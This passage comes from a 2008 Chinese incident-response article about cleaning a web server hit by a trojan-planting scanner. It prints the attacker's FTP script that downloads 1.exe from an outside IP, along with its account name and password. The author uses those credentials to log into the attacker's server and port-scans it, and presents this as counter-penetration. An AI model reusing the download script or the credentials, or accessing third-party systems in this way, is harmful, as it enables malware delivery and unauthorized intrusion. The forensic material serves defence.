攻防实战:网络维护过程中的渗透与反渗透
2008-10-30 13:29:59 来源:WEB开发网核心提示: 图2 查找被修改的网站文件2.清除挂马代码在所有文件中查找代码“ ”将其清除,(二)系统入侵痕迹搜索和整理 1.查看入侵者遗留在系统中的痕迹对系统目录以及服务器所有目录进行文件查看,攻防实战:网络维护过程中的渗透与反渗透(2),发现该入侵者使用过“143
图2 查找被修改的网站文件
2.清除挂马代码
在所有文件中查找代码“ ”将其清除。
(二)系统入侵痕迹搜索和整理
1.查看入侵者遗留在系统中的痕迹
对系统目录以及服务器所有目录进行文件查看,发现该入侵者使用过“1433全自动扫描传马工具”。通过对该工具软件的研究分析,该扫描工具中需要有配置文件,用来下载木马。果不其然,在系统目录下发现有一个文件cc1.txt生成日期是2008年5月29日,大小只有64个字节,用type命令显示如下:
open 122.138.14.8
gusdn
lixuanyu
binary
get 1.exe
bye
该文件是FTP自动下载的配置信息,直接使用CuteFTP软件进行ftp登陆尝试,填好IP地址和帐号密码,顺利登录如图3所示!从服务器上的东西不难看出,这台机器的FTP路径是Windows系统某个磁盘的根目录,里面有不少黑客用的工具,机主肯定是一个入侵者或者安全爱好者。
图3 成功登陆Ftp服务器
说明:
很多入侵者在利用网上下载的工具时,没有很好地设置和改造,只是进行简单的配置后,便开始攻击和入侵。因此,在肉机上经常留下各种木马的安装文件,有时甚至还有FTP自动上传文件的配置文件。可以使用“dir /od /a” 命令查看当前目录中的文件,如果存在小于100字节的文件,则这些文件极有可能为配置文件。
用扫描工具软件查看以下该计算机开放哪些端口,如图4所示,系统开放了80端口和远程终端服务3389端口。
- ››实战:企业使用交换机VLAN路由配置
- ››实战案例分析:高质量软文对网站百度排名的影响
- ››实战经验浅谈网站搬家后的优化工作
- ››实战Active Directory站点部署与管理,Active Dir...
- ››实战操作主机角色转移,Active Directory系列之十...
- ››实战经验:巧用微博推广淘宝网店
- ››实战iPhone GPS定位系统
- ››实战Linux环境配置DBD:Oracle模块
- ››实战DeviceIoControl系列之一:通过API访问设备驱...
- ››实战DeviceIoControl系列之二:获取软盘/硬盘/光盘...
- ››实战DeviceIoControl系列之三:制作磁盘镜像文件
- ››实战DeviceIoControl系列之四:获取硬盘的详细信息...
更多精彩
赞助商链接